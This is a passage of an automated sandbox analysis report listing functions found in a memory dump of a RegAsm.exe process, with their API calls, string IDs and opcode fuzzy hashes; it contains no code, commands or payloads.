                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID: `XA$`@
                                                                                                                                                                                                                                            • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                            • Opcode ID: d6477d560bd7f9c2ddf8b8d26ef843029050b0c67818177b9e3097335a4db553
                                                                                                                                                                                                                                            • Instruction ID: 7c3d0727f933d4e7c8f886826d2ab3f0ea7b6c3e84c16c462248bb29cb776f76
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d6477d560bd7f9c2ddf8b8d26ef843029050b0c67818177b9e3097335a4db553
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 3AF049B1D00108EBCB04DFA8DD5699EBFB5EB81302F4041A8E404BB305EA35AE60CBA5
                                                                                                                                                                                                                                            Function 004157F0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041582C
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID: `XA$`@
                                                                                                                                                                                                                                            • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                            • Opcode ID: cc232e951552d4bacc71d99b8678dc54753144998b42ffd1852ff0a63ee73d17
                                                                                                                                                                                                                                            • Instruction ID: 47261bf98c4c5b738f29456a61e0917be9c8d398335f4a949e932ca84a5df04e
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cc232e951552d4bacc71d99b8678dc54753144998b42ffd1852ff0a63ee73d17
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6F0FFB1D0010CEBCB04DFACD95599EBFB5AB91300F9441A9E805BB346DA359E60CB95
                                                                                                                                                                                                                                            Function 00415780 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 35COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 004157BC
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID: `XA$`@
                                                                                                                                                                                                                                            • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                            • Opcode ID: 5549d432100d26eadbb37aa115d1dd9050b76466dc8d117bce06f807c6107867
                                                                                                                                                                                                                                            • Instruction ID: cf2e72cc3041c7204e05a24073e0ec14b24aee4fba46d8b46a1fe6da308f96c2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5549d432100d26eadbb37aa115d1dd9050b76466dc8d117bce06f807c6107867
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CAF04FB1D00208EBDB04DFE8D94699EBFB5BB80300F5041A8E400BB355DA31AE50CB95
                                                                                                                                                                                                                                            Function 0055AC6F Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 26COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • InitializeCriticalSectionAndSpinCount.KERNEL32(00000FA0,-00000020,0055C4F5,-00000020,00000FA0,00000000,0050BDF6,00000000,0000000C), ref: 0055ACAF
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: CountCriticalInitializeSectionSpin
                                                                                                                                                                                                                                            • String ID: InitializeCriticalSectionEx$uS
                                                                                                                                                                                                                                            • API String ID: 2593887523-3775022884
                                                                                                                                                                                                                                            • Opcode ID: 8ecc14de15b3f062c649c4283e6c1ad1845279ea43ebf8b6edd17f07ea0cef32
                                                                                                                                                                                                                                            • Instruction ID: 79bf836e81b0caea49663d7db22fc0aae6f3863b6163f39525539326c9f449f6
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ecc14de15b3f062c649c4283e6c1ad1845279ea43ebf8b6edd17f07ea0cef32
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7CE09236580218BBCB112F51DC19D9D7F21FB54B62F008131FD1957160C7B28D60E7E1
                                                                                                                                                                                                                                            Function 00415860 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 24COMMON
                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0041587D
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000006.00000002.2323698156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_6_2_400000_RegAsm.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Ios_base_dtorstd::ios_base::_
                                                                                                                                                                                                                                            • String ID: `XA$`@
                                                                                                                                                                                                                                            • API String ID: 323602529-3161672447
                                                                                                                                                                                                                                            • Opcode ID: f6f2aa7a4525972061f5a70069fac671f0bbd72b64d7846ba6e33727e89ef563
                                                                                                                                                                                                                                            • Instruction ID: 9ba82dd55013fc1e9fabb96e98323f7155a8c726268295a4ba83d1893430fde2
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f6f2aa7a4525972061f5a70069fac671f0bbd72b64d7846ba6e33727e89ef563
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: DFE06DF5900208EBCB05DF84D94289EBBF4BB85300F5040A8F9046B310EA32AF20DB95